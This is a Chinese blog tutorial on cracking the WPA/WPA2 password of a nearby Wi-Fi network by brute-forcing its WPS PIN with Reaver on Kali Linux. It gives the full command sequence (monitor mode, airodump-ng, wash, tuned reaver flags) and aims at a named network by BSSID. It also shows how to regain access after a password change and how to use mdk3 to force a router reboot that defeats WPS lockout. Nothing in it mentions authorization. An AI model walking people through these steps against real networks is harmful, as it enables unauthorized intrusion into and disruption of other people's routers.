Kali如何使用Reaver破解Wi-Fi网络的WPA/WPA2密码

大家好，又见面了，我是你们的朋友全栈君。

      首先，我们需要在虚拟机VMware中安装kali系统,关于如何安装kali系统，我的博客里也有介绍；然后要准备一个USB无线网卡，我用的是小米随身wifi。

      我们要先了解Reaver的原理：它利用了WiFi保护设置（WiFi Protected Setup – 下文中简称为WPS）的一个弱点，WPS是许多路由器上都有的一个功能，可以为用户提供简单的配置过程，它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷，最终的结果就是，只要有足够的时间，它就能破解WPA或WPA2的密码。

      现在开始使用Reaver来暴力破解WiFi密码：

      第一步：找到无线网卡，在终端输入命令：iwconfig    回车，此时你应该看到无线设备的相关信息

      第二步：如上图，我的无线网卡的接口名称是wlan0，执行以下的命令，将无线网卡设置为监控模式

      第三步：此时我们看出监控模式接口的名称是wlan0mon，然后通过搜索周围一定范围内的WiFi，找到打算破解的无线网络的BSSID，执行下面的命令，如果airodump-ng wlan0命令执行失败，可以尝试对监控接口执行，例如airodump-ng wlan0mon

此时会列出周围的WiFi

   第四步：找出开启了 WPS 功能、可以使用 PIN码 登录的路由器，并另外记录下该 AP 的 BSSID（约等于该 AP 的 MAC 地址）  wash  -i  wlan0mon

   第五步：当看到你想要破解的网络时，按下Ctrl+C，停止列表刷新，然后复制该网络的BSSID。从ENC这一列可以看出，该网络是WPA或WPA2协议。我要破解的是cofco。

   现在有了BSSID和监控接口的名称，就可以实现暴力破解了。

   第六步：Reaver的命令是  reaver -i moninterface -b bssid -vv，根据你实际获取到的BSSID替换命令中的bssid：

参数说明：
-i  无线网卡名称
-b  目标AP的mac地址
-a  自动检测目标AP最佳配置
-S  使用最小的DH key，可以提高破解速度
-vv  显示更多的非严重警告（注意这是 2 个小写字母 v）
-d  即delay每穷举一次的闲置时间 预设为1秒
-c  信道编号
-p  PIN码四位或八位  //可以用8位直接找到密码。

  破解时推荐使用这个命令：reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因为–d9 –t9参数可以防止pin死路由器。

  第七步：去睡个觉，或者开几局王者，因为这个破解的时间比较长。

  破解完成之后，查看并记录下 PIN码 和 密码

  获取到 PIN码 后，以后即便路由器更换了密码，我们也可以很迅速地通过 PIN码 重新获得新密码。举例：

    reaver  -i  wlan0mon -b  xx:xx:xx:xx:xx:xx  -p 12345670

【注意事项】（此处转载于https://blog.csdn.net/Qidi_Huang/article/details/63698574）

    1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息，那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

    2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息，这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的，当连续使用超过某个次数的 PIN码 后，路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能，要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx （这是上面的目标AP的MAC地址）命令让路由器主动重启或被动重启以恢复 WPS 功能。

   如内容有所侵权，请及时告知，立刻删除。